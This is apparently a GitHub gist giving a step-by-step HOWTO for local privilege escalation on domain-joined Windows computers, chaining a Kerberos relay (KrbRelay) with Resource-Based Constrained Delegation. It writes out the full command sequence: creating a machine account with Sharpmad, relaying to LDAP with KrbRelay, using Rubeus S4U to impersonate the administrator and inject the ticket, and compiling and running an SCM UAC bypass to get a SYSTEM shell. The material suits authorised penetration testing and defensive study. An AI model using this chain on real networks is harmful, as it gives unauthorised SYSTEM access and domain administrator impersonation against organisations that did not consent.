Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Privilege Escalation using KrbRelay and RBCD

KrbRelay with RBCD Privilege Escalation HOWTO

Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.

TL;DR

No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.

Prerequisites:

  • LDAP signing not required on Domain Controller (default!)
  • Ability for the current domain user to add computers to the domain (ms-DS-MachineAccountQuota = 10 by default!) or an owned computer account

Brief

Kerberos Relay Attack adds a fake (or owned) computer account to the target's msDS-AllowedToActOnBehalfOfOtherIdentity attribute, making it possible to perform a Resource-Based Constrained Delegation Attack against the target. The result of the RBCD attack is Silver Ticket access to the target, which can be used for local admin access remotely or even locally (meaning privilege escalation) by patching the Win32 Service Control Manager to use Kerberos Authentication locally.

Technical Steps for the PrivEsc

1.) Add a computer account with SharpMad (or use an owned one):

Sharpmad.exe MAQ -Action new -MachineAccount evilcomputer -MachinePassword pass.123

2.) Get the SID of that computer object with PowerShell:

$o = ([ADSI]"LDAP://CN=evilcomputer,CN=Computers,DC=ecorp,DC=local").objectSID
(New-Object System.Security.Principal.SecurityIdentifier($o.value, 0)).Value

3.) Abuse the attribute msDS-AllowedToActOnBehalfOfOtherIdentity of the target (desktop12.ecorp.local) computer account by launching the awesome Kerberos Relay attack using KrbRelay.

First get a suitable port for COM:

CheckPort.exe

Then use the returned port value and the SID value from Step 2 for the attack:

KrbRelay.exe -spn ldap/dc1.ecorp.local -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -rbcd S-1-5-21-3239103757-393380102-551265849-2110 -port 10

For this working, LDAP signing on DC1 should not be required (default setting).

Now the computer object desktop12 should be allowed to act on behalf of the created/owned evilcomputer account. This was the key step for this attack. The following is generic RBCD Abuse.

4.) Use the S4U Action of Rubeus for getting Kerberos tickets with SPNs and impersonated to local admin access.

First calculate the NTLM hash of the owned computer account password:

Rubeus.exe hash /password:pass.123

And get a Kerberos ticket with the HOST/DESKTOP12 SPN (using for SCM access later) and inject into the current session:

Rubeus.exe s4u /user:evilcomputer$ /rc4:DBA335196E8CE3DEDB7140452ADEE42D /impersonateuser:administrator /msdsspn:host/desktop12 /ptt

Note that computername without FQDN part should be used for the SPN (to make it match for the tool used in the next step).

5.) Patch the Win32 API in Service Control Manager for using Kerberos tickets in local authentication and privesc to NT AUTHORITY\System by creating a service (launching cmd.exe). Here it is from Tyranid: https://gist.github.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82

Compile it (using cmdline Visual Studio):

cl -DUNICODE SCMUACBypass.cpp advapi32.lib

And launch it (in the session where the HOST/Desktop12 ticket is available, check it with klist):

SCMUACBypass.exe

You should have a System shell in the end. :)

+1.) Cleanup: remove the service created by the previous step (what launched cmd.exe), in the system shell:

sc delete UacBypassedService
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment